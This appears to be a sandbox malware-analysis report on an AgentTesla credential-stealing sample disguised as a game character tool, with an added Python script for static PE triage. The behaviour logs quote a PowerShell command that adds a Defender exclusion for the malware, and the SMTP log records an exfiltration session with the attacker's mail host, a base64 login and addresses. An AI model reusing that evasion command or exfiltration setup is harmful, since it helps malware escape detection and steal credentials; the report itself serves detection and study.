                                                                   IMAGE_DIRECTORY_ENTRY_IMPORT | 0xb6c48 | 0x53 | .text
                                                                   IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xb8000 | 0x6c00 | .rsrc
                                                                   IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xc0000 | 0xc | .reloc
                                                                   IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                                   IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                                   IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                                   IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                                                  Sections

                                                                   Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                                   .text | 0x2000 | 0xb4ca4 | 0xb4e00 | False | 0.792902611006 | data | 7.45346682552 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                                                   .rsrc | 0xb8000 | 0x6c00 | 0x6c00 | False | 0.443250868056 | data | 5.09977998714 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                   .reloc | 0xc0000 | 0xc | 0x200 | False | 0.044921875 | data | 0.101910425663 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                                                  Resources

                                                                   Name | RVA | Size | Type | Language | Country
                                                                   RT_ICON | 0xb8200 | 0x668 | data | |
                                                                   RT_ICON | 0xb8878 | 0x2e8 | dBase IV DBT of @.DBF, block length 512, next free block index 40, next free block 1953594267, next used block 28725 | |
                                                                   RT_ICON | 0xb8b70 | 0x128 | GLS_BINARY_LSB_FIRST | |
                                                                   RT_ICON | 0xb8ca8 | 0xea8 | data | |
                                                                   RT_ICON | 0xb9b60 | 0x8a8 | dBase IV DBT of @.DBF, block length 1024, next free block index 40, next free block 0, next used block 0 | |
                                                                   RT_ICON | 0xba418 | 0x568 | GLS_BINARY_LSB_FIRST | |
                                                                   RT_ICON | 0xba990 | 0x25a8 | data | |
                                                                   RT_ICON | 0xbcf48 | 0x10a8 | data | |
                                                                   RT_ICON | 0xbe000 | 0x468 | GLS_BINARY_LSB_FIRST | |
                                                                   RT_GROUP_ICON | 0xbe478 | 0x84 | data | |
                                                                   RT_VERSION | 0xbe50c | 0x4b4 | data | |
                                                                   RT_MANIFEST | 0xbe9d0 | 0x1ea | XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators | |

                                                                  Imports

                                                                   DLL | Import
                                                                   mscoree.dll | _CorExeMain
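The static tables above carry the whole story of a .NET loader: a single import (mscoree.dll!_CorExeMain), an entrypoint that is just `jmp dword ptr [00402000h]` through the 8-byte IAT at RVA 0x2000, a CLR header (COM_DESCRIPTOR) at 0x2008, and a .text section whose entropy of 7.45 bits per byte is far above what IL code and metadata produce, which is what an encrypted or compressed embedded payload looks like before it is decrypted and injected (see the injection and AgentTesla detections in the signature list). The Python below is an added worked example, not part of the Joe Sandbox report or of the sample: it takes the image base, entrypoint, section table and data directories exactly as listed, maps each RVA to its section, checks that the entrypoint is the standard CLR stub, and implements the 8-bit Shannon entropy measure the Sections table uses. The six stub bytes are reconstructed from the disassembly shown (FF 25 followed by the little-endian VA 0x402000); the byte strings fed to shannon_entropy in the usage block are constructed inputs, not data from the sample.

```python
"""Static-PE triage worked against the values in the Static PE Info tables above.

Added example, not part of the report. Image base, entrypoint, section table and
data directories are copied from the tables; ENTRY_STUB is reconstructed from the
disassembly 'jmp dword ptr [00402000h]' (FF 25 followed by the little-endian VA).
"""
import math
import struct
from collections import Counter

IMAGE_BASE = 0x400000
ENTRYPOINT_RVA = 0x4B6C9E - IMAGE_BASE      # 'Entrypoint:0x4b6c9e' is given as a VA

# (name, virtual address, virtual size, entropy) from the Sections table
SECTIONS = [
    (".text", 0x2000, 0xB4CA4, 7.45346682552),
    (".rsrc", 0xB8000, 0x6C00, 5.09977998714),
    (".reloc", 0xC0000, 0xC, 0.101910425663),
]

# (name, RVA, size) for the non-empty data directories
DATA_DIRECTORIES = [
    ("IMPORT", 0xB6C48, 0x53),
    ("RESOURCE", 0xB8000, 0x6C00),
    ("BASERELOC", 0xC0000, 0xC),
    ("IAT", 0x2000, 0x8),
    ("COM_DESCRIPTOR", 0x2008, 0x48),
]

# FF 25 imm32 = jmp dword ptr [imm32]; imm32 is the absolute VA of the IAT slot
ENTRY_STUB = b"\xff\x25" + struct.pack("<I", 0x402000)


def section_for_rva(rva, sections=SECTIONS):
    """Name of the section whose virtual range contains rva, or None."""
    for name, va, vsize, _ in sections:
        if va <= rva < va + vsize:
            return name
    return None


def is_clr_stub(entry_bytes, image_base, iat_rva):
    """True if the entrypoint is the native stub every PE32 .NET image starts with:
    an indirect jmp through the single IAT entry that the loader fills with
    mscoree!_CorExeMain. Anything else at the entrypoint of a file that only
    imports mscoree.dll is worth a closer look."""
    if len(entry_bytes) < 6 or entry_bytes[:2] != b"\xff\x25":
        return False
    target_va = struct.unpack_from("<I", entry_bytes, 2)[0]
    return target_va == image_base + iat_rva


def shannon_entropy(data):
    """8-bit Shannon entropy in bits per byte (0.0 .. 8.0), the scale of the Entropy column."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def triage(sections=SECTIONS, directories=DATA_DIRECTORIES, entry_rva=ENTRYPOINT_RVA,
           entry_stub=ENTRY_STUB, image_base=IMAGE_BASE, entropy_threshold=7.2):
    """Findings for a triage note: where the entrypoint and each directory live,
    whether the entrypoint is the plain CLR stub, and which sections look packed."""
    iat_rva = next(rva for name, rva, _ in directories if name == "IAT")
    return {
        "entry_section": section_for_rva(entry_rva, sections),
        "directory_sections": {name: section_for_rva(rva, sections) for name, rva, _ in directories},
        "clr_stub": is_clr_stub(entry_stub, image_base, iat_rva),
        # IL code plus metadata normally sits well below 7 bits/byte; a .text section
        # this close to 8 is dominated by an encrypted or compressed embedded payload
        "high_entropy_sections": [name for name, _, _, ent in sections if ent > entropy_threshold],
    }


if __name__ == "__main__":
    for key, value in triage().items():
        print(f"{key}: {value}")
    # constructed inputs marking the two ends of the entropy scale
    print("uniform bytes:", shannon_entropy(bytes(range(256)) * 4))
    print("all zero:    ", shannon_entropy(bytes(1024)))
```

The threshold of 7.2 bits per byte is a working heuristic, not a value from the report; on this sample .text is the only section above it, and .rsrc (icons, version info, manifest) sits at a normal 5.1.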

                                                                  Version Infos

                                                                   Description | Data
                                                                   Translation | 0x0000 0x04b0
                                                                   LegalCopyright | Copyright 2008 - 2010
                                                                   Assembly Version | 1.3.0.0
                                                                   InternalName | StaticArrayInitTypeSize8.exe
                                                                   FileVersion | 1.3.0.0
                                                                   CompanyName | WHC
                                                                   LegalTrademarks |
                                                                   Comments | A little Tool where you can check the stats of your RYL - Risk Your Life - characters. Ruins of War version.
                                                                   ProductName | RYL Character Tool - RoW EU version
                                                                   ProductVersion | 1.3.0.0
                                                                   FileDescription | RYL Character Tool - RoW EU version
                                                                   OriginalFilename | StaticArrayInitTypeSize8.exe

                                                                  Network Behavior

                                                                  Snort IDS Alerts

                                                                   Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                                                                   09/15/21-13:21:34.270587 | TCP | 2030171 | ET TROJAN AgentTesla Exfil Via SMTP | 49843 | 587 | 192.168.2.4 | 64.202.184.79

                                                                  Network Port Distribution

                                                                  TCP Packets

                                                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                   Sep 15, 2021 13:21:33.254216909 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:33.362047911 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:33.362145901 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:33.548114061 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:33.549195051 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:33.657579899 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:33.658759117 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:33.767818928 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:33.769233942 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:33.910654068 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:33.914009094 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:34.022716999 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:34.023169041 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:34.160398006 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:34.160944939 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:34.268830061 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:34.269104004 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:34.270586967 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:34.270606995 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:34.271476030 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:34.271508932 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79
                                                                   Sep 15, 2021 13:21:34.378480911 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:34.379081011 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:34.383564949 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:34.437508106 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79

                                                                  UDP Packets

                                                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                                   Sep 15, 2021 13:19:24.990336895 CEST | 49910 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:19:25.022460938 CEST | 53 | 49910 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:19:56.725431919 CEST | 55854 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:19:56.759756088 CEST | 53 | 55854 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:17.908987045 CEST | 64549 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:17.936649084 CEST | 53 | 64549 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:18.140039921 CEST | 63153 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:18.183633089 CEST | 53 | 63153 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:18.754012108 CEST | 52991 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:18.783638954 CEST | 53 | 52991 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:19.379167080 CEST | 53700 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:19.385653973 CEST | 51726 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:19.425307989 CEST | 53 | 53700 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:19.430901051 CEST | 53 | 51726 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:19.894576073 CEST | 56794 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:19.961726904 CEST | 53 | 56794 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:20.575283051 CEST | 56534 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:20.606513023 CEST | 53 | 56534 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:21.067455053 CEST | 56627 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:21.129257917 CEST | 53 | 56627 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:21.805939913 CEST | 56621 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:21.830523014 CEST | 53 | 56621 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:22.887830019 CEST | 63116 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:22.914562941 CEST | 53 | 63116 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:25.094150066 CEST | 64078 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:25.127880096 CEST | 53 | 64078 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:25.557903051 CEST | 64801 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:25.584700108 CEST | 53 | 64801 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:20:35.569762945 CEST | 61721 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:20:35.595983028 CEST | 53 | 61721 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:06.131310940 CEST | 51255 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:21:06.162621021 CEST | 53 | 51255 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:08.280268908 CEST | 61522 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:21:08.306998014 CEST | 53 | 61522 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:32.830818892 CEST | 52337 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:21:32.950429916 CEST | 53 | 52337 | 8.8.8.8 | 192.168.2.4
                                                                   Sep 15, 2021 13:21:32.979581118 CEST | 55046 | 53 | 192.168.2.4 | 8.8.8.8
                                                                   Sep 15, 2021 13:21:33.095629930 CEST | 53 | 55046 | 8.8.8.8 | 192.168.2.4

                                                                  DNS Queries

                                                                   Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class
                                                                   Sep 15, 2021 13:21:32.830818892 CEST | 192.168.2.4 | 8.8.8.8 | 0xc653 | Standard query (0) | mail.insergejk.com | A (IP address) | IN (0x0001)
                                                                   Sep 15, 2021 13:21:32.979581118 CEST | 192.168.2.4 | 8.8.8.8 | 0x4b7e | Standard query (0) | mail.insergejk.com | A (IP address) | IN (0x0001)

                                                                  DNS Answers

                                                                   Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class
                                                                   Sep 15, 2021 13:21:32.950429916 CEST | 8.8.8.8 | 192.168.2.4 | 0xc653 | No error (0) | mail.insergejk.com | insergejk.com | | CNAME (Canonical name) | IN (0x0001)
                                                                   Sep 15, 2021 13:21:32.950429916 CEST | 8.8.8.8 | 192.168.2.4 | 0xc653 | No error (0) | insergejk.com | | 64.202.184.79 | A (IP address) | IN (0x0001)
                                                                   Sep 15, 2021 13:21:33.095629930 CEST | 8.8.8.8 | 192.168.2.4 | 0x4b7e | No error (0) | mail.insergejk.com | insergejk.com | | CNAME (Canonical name) | IN (0x0001)
                                                                   Sep 15, 2021 13:21:33.095629930 CEST | 8.8.8.8 | 192.168.2.4 | 0x4b7e | No error (0) | insergejk.com | | 64.202.184.79 | A (IP address) | IN (0x0001)

                                                                  SMTP Packets

                                                                   Timestamp | Source Port | Dest Port | Source IP | Dest IP | Commands
                                                                   Sep 15, 2021 13:21:33.548114061 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4 | 220-servidor1.publinet.pe ESMTP Exim 4.94.2 #2 Wed, 15 Sep 2021 06:21:33 -0500
                                                                       220-We do not authorize the use of this system to transport unsolicited,
                                                                       220 and/or bulk e-mail.
                                                                   Sep 15, 2021 13:21:33.549195051 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79 | EHLO 116938
                                                                   Sep 15, 2021 13:21:33.657579899 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4 | 250-servidor1.publinet.pe Hello 116938 [84.17.52.51]
                                                                       250-SIZE 209715200
                                                                       250-8BITMIME
                                                                       250-PIPELINING
                                                                       250-PIPE_CONNECT
                                                                       250-AUTH PLAIN LOGIN
                                                                       250-STARTTLS
                                                                       250 HELP
                                                                   Sep 15, 2021 13:21:33.658759117 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79 | AUTH login YWRtaW5pc3RyYWNpb25AaW5zZXJnZWprLmNvbQ==
                                                                   Sep 15, 2021 13:21:33.767818928 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4 | 334 UGFzc3dvcmQ6
                                                                   Sep 15, 2021 13:21:33.910654068 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4 | 235 Authentication succeeded
                                                                   Sep 15, 2021 13:21:33.914009094 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79 | MAIL FROM:<administracion@insergejk.com>
                                                                   Sep 15, 2021 13:21:34.022716999 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4 | 250 OK
                                                                   Sep 15, 2021 13:21:34.023169041 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79 | RCPT TO:<miguel007carlos@gmail.com>
                                                                   Sep 15, 2021 13:21:34.160398006 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4 | 250 Accepted
                                                                   Sep 15, 2021 13:21:34.160944939 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79 | DATA
                                                                   Sep 15, 2021 13:21:34.269104004 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4 | 354 Enter message, ending with "." on a line by itself
                                                                   Sep 15, 2021 13:21:34.271508932 CEST | 49843 | 587 | 192.168.2.4 | 64.202.184.79 | .
                                                                   Sep 15, 2021 13:21:34.383564949 CEST | 587 | 49843 | 64.202.184.79 | 192.168.2.4 | 250 OK id=1mQSyt-0000GF-E2

                                                                  Code Manipulations

                                                                  Statistics

                                                                  CPU Usage

                                                                  Memory Usage

                                                                  High Level Behavior Distribution

                                                                  Behavior

                                                                  System Behavior

                                                                  General

                                                                  Start time:13:19:30
                                                                  Start date:15/09/2021
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                                                                  Imagebase:0x230000
                                                                  File size:769536 bytes
                                                                  MD5 hash:F116C183D3684FE8C6D8435AEF94FD41
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.712631751.0000000002612000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000000.00000002.713196181.0000000003609000.00000004.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  General

                                                                  Start time:13:19:46
                                                                  Start date:15/09/2021
                                                                  Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe'
                                                                  Imagebase:0x1120000
                                                                  File size:430592 bytes
                                                                  MD5 hash:DBA3E6449E97D4E3DF64527EF7012A10
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:19:47
                                                                  Start date:15/09/2021
                                                                  Path:C:\Windows\System32\conhost.exe
                                                                  Wow64 process (32bit):false
                                                                  Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                  Imagebase:0x7ff724c50000
                                                                  File size:625664 bytes
                                                                  MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:C, C++ or other language
                                                                  Reputation:high

                                                                  General

                                                                  Start time:13:19:47
                                                                  Start date:15/09/2021
                                                                  Path:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  Wow64 process (32bit):true
                                                                  Commandline:C:\Users\user\Desktop\SecuriteInfo.com.Trojan.Mardom.MN.15.10720.exe
                                                                  Imagebase:0x6f0000
                                                                  File size:769536 bytes
                                                                  MD5 hash:F116C183D3684FE8C6D8435AEF94FD41
                                                                  Has elevated privileges:true
                                                                  Has administrator privileges:true
                                                                  Programmed in:.Net C# or VB.NET
                                                                  Yara matches:
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.937743659.0000000002BF1000.00000004.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  • Rule: JoeSecurity_AgentTesla_2, Description: Yara detected AgentTesla, Source: 00000007.00000002.935726036.0000000000402000.00000040.00000001.sdmp, Author: Joe Security
                                                                  Reputation:low

                                                                  Disassembly

                                                                  Code Analysis

                                                                    Executed Functions

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02459D6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: eeeabf7fb460906a58d62b35d1f224ebaaa6cb34018bc68525c8d6599624f225
                                                                    • Instruction ID: d55e76fd3e6c6967f8a354005f4d70ddb452385937b63e6da1788af673a79da8
                                                                    • Opcode Fuzzy Hash: eeeabf7fb460906a58d62b35d1f224ebaaa6cb34018bc68525c8d6599624f225
                                                                    • Instruction Fuzzy Hash: 19712270A00B15CFDB64DF6AC09479BB7F5BF88204F00892AD49A9BB41D735E845CF91
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 02455B41
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: fed45d72d522c5af34dc1e408981243dbad2df3126dddb4d0e8168671055e69c
                                                                    • Instruction ID: 1b3f437c21832a5457e70e4df9290dece4c797b08754463e6189907e4d185d34
                                                                    • Opcode Fuzzy Hash: fed45d72d522c5af34dc1e408981243dbad2df3126dddb4d0e8168671055e69c
                                                                    • Instruction Fuzzy Hash: 1541F6B0D0071CCBDB24CF99C8487EEBBB5BF48308F54855AD409AB251D7716945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • CreateActCtxA.KERNEL32(?), ref: 02455B41
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: Create
                                                                    • String ID:
                                                                    • API String ID: 2289755597-0
                                                                    • Opcode ID: 7f89e5d15650c0c7731ee8d9306191c2557b9bb165b283f3435832271a39421b
                                                                    • Instruction ID: a067558d4c2deeba7d17404f66df2706c69c9d11754b5f5101e5ff4177e13161
                                                                    • Opcode Fuzzy Hash: 7f89e5d15650c0c7731ee8d9306191c2557b9bb165b283f3435832271a39421b
                                                                    • Instruction Fuzzy Hash: 4B4104B0D0075CCBDB24CFA9C8447EEBBB5BF48308F64856AD848AB251D7755945CF90
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0245BFF6,?,?,?,?,?), ref: 0245C0B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: ef0cf7d9f4dbe43945bb1326d6c0526c2199b76819db18929a8fe560bbbb358a
                                                                    • Instruction ID: 1ab04cc76e982986d995b49db3b1479a9a5993efd814a31b885917d14097127d
                                                                    • Opcode Fuzzy Hash: ef0cf7d9f4dbe43945bb1326d6c0526c2199b76819db18929a8fe560bbbb358a
                                                                    • Instruction Fuzzy Hash: 8C2103B59003189FDB10CF9AD484AEEBBF8EB48324F14841AE954A3310C378A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,0245BFF6,?,?,?,?,?), ref: 0245C0B7
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: DuplicateHandle
                                                                    • String ID:
                                                                    • API String ID: 3793708945-0
                                                                    • Opcode ID: 5edee21a0d79ae68c43fc3cf3a010be1ecec74a0f55a05b012d584568eb5e402
                                                                    • Instruction ID: 59079b4a677535ebdc6568d693f284f1f9cd25bccd53eb1af6f95057a501a33e
                                                                    • Opcode Fuzzy Hash: 5edee21a0d79ae68c43fc3cf3a010be1ecec74a0f55a05b012d584568eb5e402
                                                                    • Instruction Fuzzy Hash: F121E3B59002599FDB10CFA9D984AEEBBF4EF48324F14841AE955A3310C378A945CFA1
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,02459DE9,00000800,00000000,00000000), ref: 02459FFA
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: LibraryLoad
                                                                    • String ID:
                                                                    • API String ID: 1029625771-0
                                                                    • Opcode ID: 5c9dd162294df012344c0248927c27e64fb5cd64be9e5ec0eb5f09819aa67649
                                                                    • Instruction ID: 614b727b4d7cdf033b72743532d55a63cd4147149fdb0e8c5de271ba5d556900
                                                                    • Opcode Fuzzy Hash: 5c9dd162294df012344c0248927c27e64fb5cd64be9e5ec0eb5f09819aa67649
                                                                    • Instruction Fuzzy Hash: 8F1106B6D003189FDB10CF9AD444BEEFBF4EB48318F14842AE955A7200C375A545CFA5
                                                                    Uniqueness

                                                                    Uniqueness Score: -1.00%

                                                                    APIs
                                                                    • GetModuleHandleW.KERNELBASE(00000000), ref: 02459D6E
                                                                    Memory Dump Source
                                                                    • Source File: 00000000.00000002.712205124.0000000002450000.00000040.00000001.sdmp, Offset: 02450000, based on PE: false
                                                                    Similarity
                                                                    • API ID: HandleModule
                                                                    • String ID:
                                                                    • API String ID: 4139908857-0
                                                                    • Opcode ID: 2ce6e44b55e7beeaddba7f05b597f83a2ca3a54ab00ec524397ec0a9f7257d15
                                                                    • Instruction ID: d7f371db5192a5c6c661840b5c904fb37b7e17ce07457d99e14253486ea9e2d7
                                                                    • Opcode Fuzzy Hash: 2ce6e44b55e7beeaddba7f05b597f83a2ca3a54ab00ec524397ec0a9f7257d15
